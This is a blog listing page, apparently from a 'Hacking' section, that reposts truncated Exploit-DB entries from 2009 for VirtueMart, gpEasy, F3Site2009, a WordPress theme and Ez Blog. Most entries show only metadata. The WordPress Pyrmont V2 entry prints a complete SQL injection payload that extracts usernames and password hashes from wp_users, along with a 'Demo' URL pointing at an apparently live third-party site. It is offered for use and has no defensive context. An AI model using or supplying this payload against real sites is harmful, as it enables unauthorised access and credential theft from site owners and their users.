VirtueMart ‘product_id’ Parameter SQL Injection Vulnerability

Posted by admin Published in Hacking

# Title: VirtueMart ‘product_id’ Parameter SQL Injection Vulnerability
# EDB-ID: 10533
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Neo-GabrieL
# Published: 2009-12-17
# Verified: no
# Download Exploit Code
# Download N/A
view source
print?
Bugtraq ID: 37317
Class: Input Validation Error
CVE:
Remote: Yes
Local: No
Published: Dec 14 2009 12:00AM
Updated: Dec 17 2009 [...]

no comment

Dec

gpEasy <= 1.5RC3 Remote FIle Include E

Posted by admin Published in Hacking

# Title: gpEasy <= 1.5RC3 Remote FIle Include Exploit
# EDB-ID: 10537
# CVE-ID: ()
# OSVDB-ID: ()
# Author: cr4wl3r
# Published: 2009-12-18
# Verified: no
# Download Exploit Code
# Download N/A
view source
print?
##################################################################
## Exploit Title: gpEasy <= 1.5RC3 Remote FIle Include Exploit ##
## Date: 18-12-2009 [...]

no comment

Dec

F3Site2009 Multiple LFI Exploit

Posted by admin Published in Hacking

# Title: F3Site2009 Multiple LFI Exploit
# EDB-ID: 10536
# CVE-ID: ()
# OSVDB-ID: ()
# Author: cr4wl3r
# Published: 2009-12-18
# Verified: no
# Download Exploit Code
# Download N/A
view source
print?
##################################################################
## Exploit Title: F3Site2009 Multiple LFI Exploit ##
## Date: 18-12-2009 [...]

no comment

Dec

WordPress and Pyrmont V2. SQL Injection Vulnerability

Posted by admin Published in Hacking

# Title: WordPress and Pyrmont V2. SQL Injection Vulnerability
# EDB-ID: 10535
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Gamoscu
# Published: 2009-12-18
# Verified: no
# Download Exploit Code
# Download N/A
view source
print?
#############################################################
# WordPress and Pyrmont V2. SQL Injection Vulnerability
# Plugin Home: http://wordpress.org/extend/themes/pyrmont-v2
# Author: Gamoscu
# Site: www.1923turk.biz
# Site: http://gamoscu.wordpress.com/
##############################################################
# Exploit:
http://server/path/results.php?id=-9999+union+select+1,concat_ws(0×3a,user_login,user_pass),
3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users
-9999+union+select+1,concat_ws(0×3a,user_login,user_pass),3,4,5,6,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users
# Demo: http://cc.cc.moose.cc/maps/results.php?id=-9999+union+select+1,concat_ws(0×3a,user_login,user_pass)
,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users
##############################################################
# Greetz: Manas58 Baybora Delibey Tiamo Psiko
##############################################################
Vatan Lafla Deðil [...]

no comment

Dec

Ez Blog v1.0 (XSS/XSRF) Multiple Vulnerabilities

Posted by admin Published in Hacking

# Title: Ez Blog v1.0 (XSS/XSRF) Multiple Vulnerabilities
# EDB-ID: 10458
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Milos Zivanovic
# Published: 2009-12-15
# Verified: yes
# Download Exploit Code
# Download N/A
view source
print?
[#-----------------------------------------------------------------------------------------------#]
[#] Title: Ez Blog (XSS/XSRF) Multiple Vulnerabilities
[#] Author: Milos Zivanovic
[#] Email: milosz.security[at]gmail.com
[#] Date: 15. December 2009.
[#-----------------------------------------------------------------------------------------------#]
[#] Application: Ez Blog
[#] Version: 1.0
[#] Platform: PHP
[#] Link: link:http://www.scriptsez.net/?action=details&cat=Content%20Management&id=2579678051
[#] Price: 15 USD
[#] Vulnerability: [...]